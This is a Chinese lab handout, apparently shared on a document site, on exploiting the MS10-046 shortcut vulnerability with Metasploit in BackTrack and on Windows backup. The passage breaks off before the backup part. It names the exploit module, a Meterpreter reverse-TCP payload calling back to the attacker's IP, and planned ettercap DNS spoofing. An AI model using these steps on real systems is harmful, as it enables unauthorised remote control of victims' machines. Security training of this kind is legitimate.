利用漏洞进行溢出攻击及数据备份.docx

利用漏洞进行溢出攻击及数据备份.docx

《利用漏洞进行溢出攻击及数据备份.docx》由会员分享，可在线阅读，更多相关《利用漏洞进行溢出攻击及数据备份.docx（3页珍藏版）》请在冰豆网上搜索。

利用漏洞进行溢出攻击及数据备份

利用漏洞进行溢出攻击及数据备份

1.实训目的（后果自负）

利用系统漏洞进行溢出攻击是一种现今网络上常用的一种攻击手段，它利用C等高级语言对于数据、指针以及寄存器等保护不足及程序员在开发系统时的过错，通过多重手段屏蔽用户感知，从而获取用户所传递信息或者误导用户的网络应用操作。

本次练习主要目的是体验利用漏洞进行缓冲区溢出攻击。

数据备份是系统管理员日常进行系统、数据维护所必需掌握的技巧及手段，本次练习应用windows2003自带的备份工具进行数据备份。

2.实训所需条件及环境

硬件设备：

局域网（含机柜、配线架、交换机等）、台式PC机

软件支撑：

Windows2003、WindowsXP以及BackTract5虚拟机

网络拓扑结构：

3.实训内容

3.1利用metasploit进行溢出攻击练习

①使用metasploit开启攻击

首先是进入Metasploit。

可以点击【应用程序】→【BackTrack】→【ExploitationTools】→【NetworkExploitationTools】→【MetasploitFramewrok】进入Metasploit外，也可以在图形界面下打开任意一个终端，直接输入msfconsole命令来进入Metasploit。

此时可以看到当前包含代码数量、参数状态及最新版本等，如下图所示，进入msf的工作平台后，输入searchms10-046查询攻击代码的存放路径，即可看到名为"ms10_046_shortcut_icon_dllloader"的相关信息。

接下来，使用如下指令载入攻击代码：

Usewindows/browser/ms10_046_shortcut_icon_dllloader

回车后如下图所示，表示载入攻击代码成功。

此时，可以通过showoptions来查看可以（必需）进行的参数配置。

在了解需进行的攻击参数的配置后，接下来就可以使用set命令来依次配置参数。

其中，还需设置PAYLOAD为获取windows的shellcode，即windows/metepreter/reverse_tcp。

此外，由于后面攻击还要使用ettercap对目标进行DNS欺骗攻击，所以要将反弹端口的目的地设置为自身IP，即设置LHOST为自身IP。

具体命令如下：